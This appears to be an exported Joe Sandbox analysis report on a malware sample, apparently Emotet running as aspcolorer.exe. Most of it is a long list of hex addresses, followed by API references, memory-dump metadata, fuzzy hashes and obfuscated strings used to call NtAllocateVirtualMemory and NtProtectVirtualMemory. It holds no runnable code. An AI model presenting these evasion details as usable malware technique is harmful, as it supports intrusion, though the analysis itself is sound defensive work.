0x041d5854
0x041d5857
0x041d585a
0x041d585d
0x041d5860
0x041d5860
0x041d5864
0x041d5867
0x041d586d
0x041d5870
0x041d5873
0x041d5876
0x041d5879
0x041d587c
0x00000000
0x00000000
0x00000000
0x00000000
0x041d587c
0x041d5837
0x00000000
0x041d57f6
0x041d57f6
0x041d57f6
0x041d57f6
0x041d57f8
0x041d57f9
0x041d57fc
0x041d57fe
0x00000000
0x00000000
0x041d5804
0x041d5807
0x041d580a
0x041d650f
0x041d650f
0x041d6516
0x00000000
0x041d5810
0x041d5810
0x041d5822
0x041d5825
0x041d5828
0x041d582a
0x00000000
0x041d582a
0x00000000
0x041d580a
0x041d58f8
0x041d58f8
0x041d58fb
0x041d58fd
0x041d5900
0x00000000
0x00000000
0x00000000
0x041d5900
0x00000000
0x041d58f8
0x041d57cb
0x041d57cb
0x041d57cb
0x041d57cf
0x041d66b4
0x041d66b4
0x041d66b7
0x00000000
0x00000000
0x00000000
0x00000000
0x041d57cf
0x041d5780
0x041d5780
0x041d5780
0x041d5782
0x041d57a7
0x041d57ac
0x041d57b1
0x041d57b3
0x041d57b5
0x041d57b5
0x041d57b5
0x041d57b8
0x041d57bb
0x00000000
0x041d5784
0x041d5784
0x041d5784
0x041d5784
0x041d5787
0x00000000
0x00000000
0x041d578d
0x041d5792
0x041d5794
0x041d5795
0x041d5798
0x041d579a
0x041d579d
0x041d57a0
0x041d57a3
0x041d57a5
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d57a5
0x041d664c
0x041d664c
0x00000000
0x041d664c
0x041d5782
0x041d6467
0x041d6467
0x041d646c
0x041d646f
0x041d64e6
0x041d64e6
0x041d64ed
0x041d64f0
0x041d64f3
0x041d64f8
0x041d64fe
0x041d6501
0x041d6504
0x041d6507
0x00000000
0x041d6471
0x041d6471
0x041d6478
0x041d6480
0x041d6483
0x041d6485
0x041d649f
0x041d649f
0x041d64a2
0x00000000
0x041d64a8
0x041d64a8
0x041d64ad
0x041d64ad
0x041d64b0
0x041d64b0
0x041d64be
0x041d64c9
0x041d64ca
0x041d64cd
0x041d64d0
0x041d64d2
0x00000000
0x00000000
0x041d64d8
0x041d64d8
0x041d64d9
0x041d64db
0x00000000
0x041d64e1
0x041d64e1
0x041d64e1
0x00000000
0x041d64e1
0x00000000
0x041d64db
0x00000000
0x041d64b0
0x041d6487
0x041d6487
0x041d6487
0x041d648a
0x041d648c
0x041d56ef
0x041d56ef
0x041d56f2
0x041d6657
0x041d6657
0x00000000
0x00000000
0x00000000
0x00000000
0x041d6492
0x041d6492
0x041d6492
0x041d6494
0x00000000
0x041d649a
0x041d649a
0x00000000
0x041d649a
0x041d6494
0x041d648c
0x00000000
0x041d56f8
0x041d56fb
0x041d56fd
0x041d56ff
0x041d5700
0x041d5702
0x041d5705
0x041d5708
0x041d570b
0x041d570b
0x041d6471
0x00000000
0x041d646f
0x041d6423
0x041d6423
0x041d6423
0x041d6425
0x041d644a
0x041d644f
0x041d644f
0x041d6454
0x041d6456
0x041d6458
0x041d6458
0x041d6458
0x041d645b
0x00000000
0x041d6427
0x041d6427
0x041d6427
0x041d6427
0x041d642a
0x00000000
0x00000000
0x041d6430
0x041d6435
0x041d6437
0x041d6438
0x041d643b
0x041d643d
0x041d6440
0x041d6443
0x041d6446
0x041d6448
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d6448
0x041d6641
0x041d6641
0x00000000
0x041d6641
0x041d6425
0x041d5b6f
0x041d5b6f
0x041d5b6f
0x041d5b6f
0x041d5b73
0x00000000
0x00000000
0x041d5b79
0x041d5b79
0x041d5b7c
0x041d5b9f
0x041d5ba1
0x041d5ba4
0x041d5ba7
0x041d5baa
0x041d5bad
0x041d5bad
0x041d5baf
0x041d5bb2
0x041d5bb5
0x041d5bb8
0x041d5d7b
0x041d5d7b
0x041d5d7e
0x041d6674
0x041d6674
0x041d667b
0x00000000
0x041d5d84
0x041d5d84
0x041d5d84
0x041d5d87
0x041d5e56
0x041d5e56
0x041d5e56
0x041d5e58
0x041d5e58
0x041d5e58
0x041d5e5b
0x041d5e5e
0x00000000
0x00000000
0x041d5e64
0x041d5e64
0x041d5e6b
0x041d5e6e
0x041d5e70
0x041d5e9f
0x041d5e9f
0x041d5eaa
0x041d5eb2
0x041d5eb5
0x041d5eb8
0x041d5ebf
0x041d5ec1
0x041d5ec3
0x041d5ec5
0x041d5ec8
0x041d5ed2
0x041d5ed5
0x041d5ed7
0x041d5eda
0x00000000
0x041d5e72
0x041d5e72
0x041d5e72
0x041d5e72
0x041d5e75
0x00000000
0x00000000
0x041d5e7b
0x041d5e80
0x041d5e82
0x041d5e83
0x041d5e86
0x041d5e88
0x041d5e8b
0x041d5e8e
0x041d5e91
0x041d5e98
0x041d5e9b
0x041d5e9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5e9d
0x041d6595
0x041d6595
0x00000000
0x041d6595
0x00000000
0x041d5e70
0x041d5ee0
0x041d5ee5
0x041d5eee
0x041d5ef4
0x041d5ef7
0x041d5efa
0x041d5efa
0x041d5efc
0x041d5efc
0x041d5efc
0x041d5eff
0x041d5f02
0x00000000
0x00000000
0x041d5f04
0x041d5f04
0x041d5f07
0x041d5f2a
0x041d5f2f
0x041d5f32
0x041d5f35
0x041d5f38
0x041d5f3b
0x041d5f3e
0x041d5f45
0x041d5f4f
0x00000000
0x041d5f09
0x041d5f09
0x041d5f09
0x041d5f09
0x041d5f0c
0x00000000
0x00000000
0x041d5f12
0x041d5f17
0x041d5f19
0x041d5f1a
0x041d5f1c
0x041d5f1f
0x041d5f22
0x041d5f25
0x041d5f28
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5f28
0x041d65a0
0x041d65a0
0x00000000
0x041d65a0
0x00000000
0x041d5f07
0x041d5f52
0x041d5f52
0x00000000
0x041d5d8d
0x041d5d8d
0x041d5d8d
0x041d5d92
0x041d5d93
0x041d5d94
0x00000000
0x041d5d94
0x041d5d87
0x041d5bbe
0x041d5bbe
0x041d5bc0
0x041d5bc3
0x041d5bc5
0x041d5bec
0x041d5bee
0x041d5bf1
0x041d5bf3
0x041d5bf5
0x041d5bf8
0x041d5bf8
0x041d5bfa
0x041d5bfa
0x041d5bfa
0x041d5bfd
0x041d5c00
0x00000000
0x00000000
0x041d5c02
0x041d5c02
0x041d5c04
0x041d5c42
0x041d5c42
0x041d5c45
0x041d655f
0x041d655f
0x00000000
0x041d5c4b
0x041d5c4b
0x041d5c4b
0x041d5c4d
0x041d5c4e
0x041d5c55
0x041d5c56
0x00000000
0x041d5c56
0x041d5c06
0x041d5c06
0x041d5c06
0x041d5c09
0x041d5c2f
0x041d5c2f
0x041d5c36
0x041d5c39
0x041d5c3c
0x041d5c3d
0x00000000
0x041d5c0b
0x041d5c0b
0x041d5c0b
0x041d5c0b
0x041d5c0e
0x00000000
0x00000000
0x041d5c14
0x041d5c19
0x041d5c1b
0x041d5c1c
0x041d5c1e
0x041d5c21
0x041d5c24
0x041d5c27
0x041d5c2a
0x00000000
0x041d5c2c
0x041d5c2c
0x041d5c2c
0x00000000
0x041d5c2c
0x00000000
0x041d5c2a
0x041d6554
0x041d6554
0x00000000
0x041d6554
0x041d5c09
0x00000000
0x041d5c04
0x041d5c5b
0x041d5c6e
0x041d5c75
0x041d5c8a
0x041d5c8d
0x041d6662
0x041d6662
0x041d6669
0x00000000
0x041d5c93
0x041d5c93
0x041d5c93
0x041d5c96
0x041d5c96
0x041d5c96
0x041d5c98
0x00000000
0x00000000
0x041d5c9e
0x041d5c9e
0x041d5ca0
0x041d5cfc
0x041d5cfc
0x041d5cff
0x041d5cff
0x041d5cff
0x041d5d01
0x00000000
0x00000000
0x041d5d11
0x041d5d11
0x041d5d14
0x041d5d16
0x041d5d30
0x041d5d30
0x041d5d33
0x041d5d35
0x041d6587
0x041d6587
0x041d658a
0x00000000
0x041d5d3b
0x041d5d3b
0x041d5d3b
0x041d5d40
0x041d5d42
0x041d5d46
0x041d5d49
0x041d5d4b
0x041d5d54
0x041d5d4d
0x041d5d4d
0x041d5d4f
0x041d5d4f
0x041d5d56
0x041d5d5b
0x041d5d5b
0x041d5d64
0x041d5d69
0x041d5d6b
0x041d5d6e
0x041d5d71
0x041d5d73
0x041d5d76
0x00000000
0x041d5d76
0x041d5d18
0x041d5d18
0x041d5d18
0x041d5d1b
0x041d5d22
0x00000000
0x041d5d22
0x00000000
0x041d5d16
0x041d5d03
0x041d5d03
0x041d5d08
0x00000000
0x041d5ca2
0x041d5ca2
0x041d5ca2
0x041d5ca5
0x041d5cc8
0x041d5cc8
0x041d5ccb
0x041d5cce
0x041d5cd1
0x041d5cd4
0x041d5cdc
0x041d5cdf
0x041d5ce2
0x041d5ce5
0x041d6575
0x041d6575
0x041d657c
0x00000000
0x041d5ceb
0x041d5ceb
0x041d5cee
0x041d5cf1
0x041d5cf6
0x041d5cf7
0x00000000
0x041d5cf7
0x041d5ca7
0x041d5ca7
0x041d5ca7
0x041d5ca7
0x041d5caa
0x00000000
0x00000000
0x041d5cb0
0x041d5cb5
0x041d5cb7
0x041d5cb8
0x041d5cba
0x041d5cbd
0x041d5cc0
0x041d5cc3
0x041d5cc6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5cc6
0x041d656a
0x041d656a
0x00000000
0x041d656a
0x041d5ca5
0x00000000
0x041d5ca0
0x00000000
0x041d5c96
0x041d5bc7
0x041d5bc7
0x041d5bc7
0x041d5bc7
0x041d5bca
0x00000000
0x00000000
0x041d5bd0
0x041d5bd5
0x041d5bd7
0x041d5bda
0x041d5bdc
0x041d5bdf
0x041d5be2
0x041d5be5
0x041d5be8
0x041d5bea
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5bea
0x041d6549
0x041d6549
0x00000000
0x041d6549
0x041d5bc5
0x041d5b7e
0x041d5b7e
0x041d5b7e
0x041d5b7e
0x041d5b81
0x00000000
0x00000000
0x041d5b87
0x041d5b8c
0x041d5b8e
0x041d5b8f
0x041d5b91
0x041d5b94
0x041d5b97
0x041d5b9a
0x041d5b9d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5b9d
0x041d653e
0x041d653e
0x041d6732
0x041d6732
0x041d673b
0x041d6740
0x041d6740
0x041d6743
0x041d6746
0x041d6749
0x041d674b
0x041d674b
0x041d674e
0x041d6750
0x041d675d
0x041d675d
0x041d6760
0x041d6762
0x041d6764
0x041d6764
0x041d6764
0x041d6767
0x00000000
0x00000000
0x041d6769
0x041d6769
0x041d676a
0x041d676d
0x041d676f
0x00000000
0x00000000
0x00000000
0x041d676f
0x041d6764
0x041d6762
0x041d674e
0x041d6749
0x00000000
0x041d5b7c
0x041d65c1
0x041d65c3
0x041d65c6
0x041d65c8
0x041d65f2
0x041d65f2
0x041d65f7
0x041d65fa
0x041d65fc
0x041d65fe
0x041d6601
0x041d6603
0x041d6605
0x041d6605
0x041d6605
0x041d6608
0x00000000
0x00000000
0x041d660a
0x041d660a
0x041d660b
0x041d660e
0x041d6610
0x00000000
0x00000000
0x00000000
0x041d6610
0x041d6605
0x041d6612
0x041d6617
0x041d6617
0x041d661b
0x041d661e
0x041d6621
0x041d6624
0x041d6626
0x041d6629
0x041d662d
0x041d6630
0x041d6634
0x041d6752
0x041d6752
0x041d6752
0x041d6754
0x041d675a
0x041d675a
0x00000000
0x041d663a
0x041d663a
0x041d663a
0x041d6703
0x041d6703
0x041d6703
0x041d6706
0x041d6709
0x00000000
0x00000000
0x041d670b
0x041d670b
0x041d670d
0x041d671a
0x041d671a
0x041d671d
0x041d6720
0x041d66e7
0x041d66e7
0x041d66ed
0x041d66ed
0x041d66f0
0x00000000
0x041d6722
0x041d6722
0x041d66ca
0x041d66ca
0x041d66ca
0x041d66cd
0x00000000
0x00000000
0x041d66cf
0x041d66d4
0x041d66d6
0x041d66d9
0x041d66db
0x041d66dc
0x041d66df
0x041d66e2
0x00000000
0x041d66e4
0x041d66e4
0x041d66e4
0x00000000
0x041d66e4
0x00000000
0x041d66e2
0x041d672c
0x041d672c
0x00000000
0x041d672c
0x041d670f
0x041d670f
0x041d670f
0x041d6712
0x041d6724
0x041d6724
0x00000000
0x041d6714
0x041d6714
0x041d6714
0x041d6717
0x041d66f3
0x041d66f3
0x041d66fc
0x041d66ff
0x041d66ff
0x041d6700
0x00000000
0x041d6700
0x041d6712
0x00000000
0x041d670d
0x00000000
0x041d6703
0x041d65d0
0x00000000
0x041d65d0
0x041d65d0
0x041d65d0
0x041d65d3
0x00000000
0x00000000
0x041d65d9
0x041d65de
0x041d65e0
0x041d65e3
0x041d65e5
0x041d65e8
0x041d65eb
0x041d65ee
0x041d65f0
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d65f0
0x041d66c2
0x041d66c2
0x00000000
0x041d66c2
0x041d65c8
0x041d5995
0x041d5995
0x041d5995
0x041d5998
0x041d599a
0x041d599e
0x041d59a0
0x041d59a3
0x041d59a6
0x041d59ae
0x041d59b3
0x041d59b6
0x041d59b6
0x041d59b9
0x041d59b9
0x041d59c3
0x041d59cb
0x041d59ce
0x041d59d0
0x041d59d9
0x041d59d9
0x041d59de
0x041d59df
0x041d59e0
0x041d59e1
0x041d59e1
0x041d59e5
0x041d59e7
0x041d59ed
0x041d59f5
0x041d59f5
0x041d59f9
0x041d59fc
0x041d59d2
0x041d59d2
0x041d59d4
0x041d59d4
0x041d59ff
0x041d59ff
0x041d5a02
0x041d5a04
0x041d5a09
0x041d5a0c
0x041d5a0e
0x041d5a11
0x041d5a17
0x041d5b57
0x041d5b57
0x041d5b57
0x041d5b57
0x00000000
0x041d5a1d
0x041d5a1d
0x041d5a1d
0x041d5a20
0x041d5a26
0x041d5a29
0x041d58f8
0x041d58f8
0x041d58f8
0x041d58f8
0x041d58fb
0x041d58fd
0x041d5900
0x00000000
0x00000000
0x00000000
0x041d5900
0x041d587e
0x041d587e
0x041d587e
0x041d5882
0x041d5887
0x041d5888
0x041d588a
0x041d588c
0x041d588f
0x041d5892
0x041d5894
0x041d58e6
0x041d58e6
0x041d58eb
0x041d58ef
0x041d58f2
0x041d58f2
0x041d58f5
0x041d58f5
0x041d58f5
0x041d58f5
0x041d58f8
0x041d58f8
0x041d58fb
0x041d58fd
0x041d5900
0x00000000
0x00000000
0x00000000
0x041d5900
0x041d58c1
0x041d58c1
0x041d58c4
0x041d58c7
0x041d58ca
0x041d58cd
0x041d58d0
0x041d58d0
0x041d58d4
0x041d58d9
0x041d58da
0x041d58dc
0x041d58de
0x041d58e1
0x041d58e4
0x00000000
0x00000000
0x00000000
0x041d58e4
0x041d5a17
0x041d598f
0x041d6771
0x041d6771
0x041d6774
0x041d6776
0x041d677b
0x041d677e
0x041d6781
0x041d6784
0x041d6786
0x041d6789
0x041d6793
0x041d679e
0x041d67a1
0x041d67a5
0x041d67ab
0x041d67b1
0x041d67b7
0x041d67ba
0x041d67bd
0x041d67c2
0x041d67c5
0x041d67c7
0x041d67cd
0x041d67cd
0x041d67cf
0x041d67d5
0x041d67d5
0x041d67df
0x041d67e5
0x041d67ee
0x041d67f1
0x041d67f4
0x041d67f6
0x041d67fa
0x041d67fd
0x041d6803
0x041d6803
0x041d6805
0x041d6805
0x041d6805
0x041d6807
0x041d680a
0x041d680d
0x041d6813
0x041d6813
0x041d6818
0x041d6819
0x041d681a
0x041d681b
0x041d681b
0x041d681b
0x041d6820
0x041d6820
0x041d6823
0x041d6826
0x041d6831
0x041d683c
0x041d6847
0x041d6852
0x041d685d
0x041d6868
0x041d6873
0x041d6878
0x041d687b
0x041d687d
0x041d6882
0x041d6884
0x041d6884
0x041d6889
0x041d688c
0x041d688c
0x041d688f
0x041d688f
0x041d6891
0x041d6894
0x041d6896
0x041d6898
0x041d689c
0x041d689f
0x041d68a1
0x041d68a1
0x041d68a6
0x041d68ae
0x041d68b2
0x041d68b2
0x041d68b6
0x041d68c0
0x041d68c0
0x041d68c3
0x041d68c5
0x041d68c9
0x041d68cb
0x041d68ce
0x041d68d0
0x041d68d2
0x041d68d2
0x041d68d2
0x041d68d5
0x041d68d8
0x041d68db
0x041d68de
0x041d68e1
0x041d68e1
0x041d68e4
0x041d68e4
0x041d68e6
0x041d68e8
0x041d68ee
0x041d68f0
0x041d68f2
0x041d68f2
0x041d68f3
0x041d68f3
0x041d68f6
0x041d68f9
0x041d68fb
0x041d68fb
0x041d68fb
0x041d68fd
0x041d6902
0x041d690d
0x041d6919
0x041d691f
0x041d6921
0x041d6921
0x041d6921
0x041d6924
0x041d6929
0x041d692c
0x041d692c
0x041d6935
0x041d693a
0x041d693a
0x041d693b
0x041d693e
0x041d6940
0x041d6943
0x041d6945
0x041d6947
0x041d694b
0x041d694d
0x041d6955
0x041d6955
0x041d694b
0x041d6945
0x041d67cf
0x041d6958
0x041d6960
0x00000000
0x041d5a2e
0x041d5a2e
0x041d5a31
0x041d5ae3
0x041d5aea
0x041d5af2
0x041d5af5
0x041d5af7
0x041d5b08
0x041d5b08
0x041d5b0d
0x041d5b0e
0x041d5b0f
0x041d5b10
0x041d5b10
0x041d5b14
0x041d5b16
0x041d5b1c
0x041d5b24
0x041d5b24
0x041d5b28
0x041d5b2b
0x041d5af9
0x041d5af9
0x041d5afb
0x041d5afe
0x041d5b03
0x041d5b03
0x041d5b2e
0x041d5b2e
0x041d5b30
0x041d5b32
0x041d5b35
0x041d5b38
0x041d5b3e
0x00000000
0x041d5b40
0x041d5b40
0x041d5b40
0x041d5b43
0x041d5b46
0x041d652c
0x041d652c
0x041d6533
0x00000000
0x041d5b4c
0x041d5b4c
0x041d5b4c
0x041d5b4f
0x00000000
0x041d5b4f
0x041d5b46
0x041d5a37
0x041d5a37
0x041d5a37
0x041d5a3a
0x041d5abf
0x041d5abf
0x041d5ac6
0x041d5ac9
0x041d5ace
0x041d5ad4
0x041d5ad7
0x041d5ada
0x041d5ada
0x041d5add
0x00000000
0x041d5a40
0x041d5a40
0x041d5a40
0x041d5a42
0x041d5a47
0x041d5a4f
0x041d5a51
0x041d5a64
0x041d5a64
0x041d5a67
0x00000000
0x041d5a69
0x041d5a69
0x041d5a6e
0x041d5a71
0x041d5a71
0x041d5a7f
0x041d5a8a
0x041d5a8b
0x041d5a8e
0x041d5a90
0x00000000
0x00000000
0x041d5a92
0x041d5a92
0x041d5a95
0x041d5a97
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5a97
0x00000000
0x041d5a71
0x041d5a53
0x041d5a53
0x041d5a53
0x041d5a56
0x041d5a58
0x041d5a99
0x041d5a99
0x041d5a9c
0x041d5a9c
0x041d5a9f
0x041d6521
0x041d6521
0x00000000
0x00000000
0x00000000
0x00000000
0x041d5a5a
0x041d5a5a
0x041d5a5a
0x041d5a5c
0x041d5ae0
0x041d5ae0
0x00000000
0x041d5a62
0x041d5a62
0x00000000
0x041d5a62
0x041d5a5c
0x041d5a58
0x00000000
0x041d5aa5
0x041d5aa8
0x041d5aaa
0x041d5aac
0x041d5aad
0x041d5aaf
0x041d5ab2
0x041d5ab5
0x041d5ab8
0x041d5ab8
0x00000000
0x041d5abd
0x041d5a3a
0x00000000
0x041d5a31
0x041d58f8
0x041d5f64
0x041d5f73
0x041d5f7d
0x041d5f93
0x041d5fa9
0x041d5fb2
0x041d5fb7
0x041d5fba
0x041d5fbd
0x041d5fc2
0x041d5fc4
0x041d5fc4
0x041d5fd0
0x041d5fd0
0x041d5fd0
0x041d5fd4
0x041d5fd5
0x041d5fdc
0x041d5fd0
0x041d5fe0
0x041d5fe0
0x041d5fe5
0x041d5fe6
0x041d5fe7
0x041d5fe8
0x041d5fe9
0x041d5fe9
0x041d5fef
0x041d5ff5
0x041d5ff8
0x041d6000
0x041d6000
0x041d6000
0x041d6009
0x041d600b
0x041d600d
0x041d6014
0x041d6017
0x041d6020
0x041d6027
0x041d6029
0x041d602c
0x041d6035
0x041d6037
0x041d603e
0x041d6041
0x041d604c
0x041d604f
0x041d6055
0x041d6058
0x041d6061
0x041d606c
0x041d606c
0x041d606f
0x041d6076
0x041d6080
0x041d6086
0x041d6086
0x041d6090
0x041d6090
0x041d6095
0x041d6095
0x041d6099
0x041d609e
0x041d60a4
0x041d60a4
0x041d60ab
0x041d60af
0x041d60b6
0x041d60bb
0x00000000
0x041d60c0
0x041d60c0
0x041d60cb
0x041d60ce
0x041d60cf
0x041d60d1
0x041d60d4
0x041d60d8
0x041d60d8
0x041d60db
0x041d60de
0x041d612d
0x041d613d
0x041d6140
0x041d6143
0x041d6146
0x041d6149
0x041d614c
0x041d614e
0x041d6153
0x041d6156
0x041d6158
0x041d6158
0x041d615b
0x041d615e
0x041d615e
0x041d6161
0x041d6161
0x041d6164
0x041d6167
0x041d6169
0x041d6169
0x041d6169
0x041d616c
0x041d616f
0x041d6172
0x041d6172
0x041d6172
0x041d6180
0x041d6185
0x041d6189
0x041d618c
0x041d61a4
0x041d618e
0x041d6191
0x041d6195
0x041d6198
0x041d619a
0x041d619d
0x041d61a0
0x041d61a0
0x041d61a7
0x041d61a7
0x041d61a7
0x041d61a7
0x041d61a7
0x041d61ac
0x041d61af
0x041d61af
0x041d61b1
0x041d61b6
0x041d61b6
0x041d61bb
0x041d60e0
0x041d60e0
0x041d60e7
0x041d60ea
0x041d60f3
0x041d60f9
0x041d60f9
0x041d60fe
0x041d60ff
0x041d6100
0x041d6101
0x041d6101
0x041d6106
0x041d610f
0x041d6115
0x041d6115
0x041d6115
0x041d6118
0x041d611a
0x041d611d
0x041d6125
0x041d6125
0x041d60f3
0x041d60de
0x041d61c3
0x041d61c3
0x041d61c6
0x041d61c7
0x041d61d1
0x041d61d6
0x041d61d6
0x041d61d7
0x041d61db
0x041d63f6
0x041d63f6
0x00000000
0x041d61e1
0x041d61e1
0x041d61e1
0x041d61e3
0x041d61e3
0x041d61e3
0x041d61e6
0x041d61e6
0x041d61ec
0x041d61f1
0x00000000
0x00000000
0x041d61f7
0x041d61fa
0x041d62b2
0x041d62b9
0x041d62c1
0x041d62c6
0x041d62d7
0x00000000
0x041d62e0
0x041d62e0
0x041d62e0
0x041d62e5
0x041d62e7
0x041d62ee
0x041d62f6
0x041d62f9
0x041d62f9
0x041d62c8
0x041d62c8
0x041d62ca
0x041d62cd
0x041d62d2
0x041d62d2
0x041d62fd
0x041d62fd
0x041d62ff
0x041d6301
0x041d6304
0x041d630a
0x041d631c
0x041d631c
0x041d632c
0x041d632c
0x041d6333
0x041d6336
0x041d6338
0x041d6360
0x041d636e
0x041d6371
0x041d6378
0x041d637b
0x041d637d
0x041d6381
0x041d6384
0x041d6387
0x041d6393
0x041d6393
0x041d6389
0x041d6389
0x041d6389
0x041d6395
0x041d63a0
0x041d63a9
0x041d63ac
0x041d63ae
0x041d61e3
0x041d61e3
0x00000000
0x041d633a
0x041d633a
0x041d633a
0x041d633a
0x041d633d
0x00000000
0x00000000
0x041d6343
0x041d6348
0x041d634a
0x041d634b
0x041d634e
0x041d6350
0x041d6353
0x041d6356
0x041d6359
0x041d635b
0x00000000
0x041d635d
0x041d635d
0x041d635d
0x00000000
0x041d635d
0x00000000
0x041d635b
0x041d65b6
0x041d65b6
0x00000000
0x041d65b6
0x041d631e
0x041d631e
0x041d631e
0x041d6321
0x041d6323
0x041d6698
0x041d6698
0x041d669b
0x00000000
0x041d6329
0x041d6329
0x041d6329
0x00000000
0x041d6329
0x041d6323
0x041d630c
0x041d630c
0x041d630c
0x041d630f
0x041d6316
0x00000000
0x041d6316
0x041d6200
0x041d6200
0x041d6208
0x041d628e
0x041d628e
0x041d6295
0x041d6298
0x041d629d
0x041d62a3
0x041d62a6
0x041d62a9
0x041d62a9
0x041d62ac
0x00000000
0x041d620e
0x041d620e
0x041d620e
0x041d6210
0x041d6215
0x041d621f
0x041d6232
0x041d6232
0x041d6235
0x00000000
0x041d6237
0x041d6237
0x041d623c
0x041d623c
0x041d6240
0x041d6240
0x041d624e
0x041d6259
0x041d625a
0x041d625d
0x041d625f
0x00000000
0x00000000
0x041d6261
0x041d6261
0x041d6264
0x041d6266
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x041d6266
0x00000000
0x041d6240
0x041d6221
0x041d6221
0x041d6221
0x041d6226
0x041d6268
0x041d6268
0x041d626b
0x041d626e
0x041d65ab
0x041d65ab
0x00000000
0x00000000
0x00000000
0x00000000
0x041d6228
0x041d6228
0x041d622a
0x041d62af
0x041d62af
0x00000000
0x041d6230
0x041d6230
0x00000000
0x041d6230
0x041d622a
0x041d6226
0x00000000
0x041d6274
0x041d6277
0x041d6279
0x041d627b
0x041d627c
0x041d627e
0x041d6281
0x041d6284
0x041d6287
0x00000000
0x041d628c
0x041d6208
0x00000000
0x041d61fa
0x041d63b6
0x041d63b9
0x041d63bc
0x041d63be
0x041d63c0
0x041d66a6
0x041d66a6
0x041d66a9
0x00000000
0x041d63c6
0x041d63c6
0x041d63d2
0x041d63e3
0x041d63e3
0x041d63ed
0x041d63f3
0x00000000
0x041d63f3
0x00000000
0x041d63c0
0x041d61e3
0x041d6686
0x041d6686
0x041d6686
0x041d668d
0x00000000
0x041d668d
0x00000000
0x041d6061

APIs

memset.NTDLL ref: 041D5DA8
memset.NTDLL ref: 041D5F7D
memset.NTDLL ref: 041D5F93
memset.NTDLL ref: 041D5FA9

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 5d170095a303679493525917dfefe21de5cfe34a40e95fa6d5235cb83879f7bb
Instruction ID: 2d05ef34022d2b3fab6ecc4d9d2e535ba401d339e9c75c09762eabf1730889ca
Opcode Fuzzy Hash: 5d170095a303679493525917dfefe21de5cfe34a40e95fa6d5235cb83879f7bb
Instruction Fuzzy Hash: 86314BB2E10B82E7E7088B65D801BB8B771FBD9304F205316E5D599642EB78B6A4C7C0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: aspcolorer.exe PID: 7008 Parent PID: 568 aspcolorer.exeCOMMON

Execution Graph

Execution Coverage:	4.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	469
Total number of Limit Nodes:	5

Executed Functions

Function 02D42000, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 02D4203E
NtAllocateVirtualMemory.NTDLL ref: 02D420C5

Strings

YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 02D4202B
w, xrefs: 02D42075
A, xrefs: 02D42079
l, xrefs: 02D4207D
y, xrefs: 02D42069
Z, xrefs: 02D42071
l, xrefs: 02D42081
r, xrefs: 02D42065
l, xrefs: 02D42085

Memory Dump Source

Source File: 00000005.00000002.668305085.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.668312256.0000000002D46000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d40000_aspcolorer.jbxd

Similarity

API ID: AllocateMemoryVirtualmemcpy
String ID: A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2505947351-868024915
Opcode ID: 2476da232ee07c0ef6ef69dbd0943fd176239d4ee921fa3a8a8dc98d786e6a9a
Instruction ID: 9330679fdddc417b0efa1d6aaea520e9bcb46c996d70e3f0b64e8910b62720e9
Opcode Fuzzy Hash: 2476da232ee07c0ef6ef69dbd0943fd176239d4ee921fa3a8a8dc98d786e6a9a
Instruction Fuzzy Hash: 4E312770E04248CBDB14CFA8D44478DFFB1AF85318F24C19AD858AB342C776A946CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D41EF0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 74
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memcpy.MSVCRT ref: 02D41F51
NtProtectVirtualMemory.NTDLL ref: 02D41FE3

Strings

@, xrefs: 02D41F66
V, xrefs: 02D41F7B
M, xrefs: 02D41F7F
w, xrefs: 02D41F77
Z, xrefs: 02D41F73
yyProtectairtual emory, xrefs: 02D41F13

Memory Dump Source

Source File: 00000005.00000002.668305085.0000000002D40000.00000040.00000001.sdmp, Offset: 02D40000, based on PE: true

Associated: 00000005.00000002.668312256.0000000002D46000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2d40000_aspcolorer.jbxd

Similarity

API ID: MemoryProtectVirtualmemcpy
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2440499307-3039725267
Opcode ID: 1eaefc6b6da7ac30f5e15cd5d8e76a1d579b53870337ffa9dc73c5b210a1a7b4
Instruction ID: 7a2d16367eace86e4e0c0672d375658f033d125b6a7de96a5e041f42ff0ef6b8
Opcode Fuzzy Hash: 1eaefc6b6da7ac30f5e15cd5d8e76a1d579b53870337ffa9dc73c5b210a1a7b4
Instruction Fuzzy Hash: 7A31C1B5D042188BDB14DF68C580B9EBBF0BB48314F2085AED85CAB381D7359A85CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 02D611CD, Relevance: 9.0, APIs: 6, Instructions: 27
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 41%

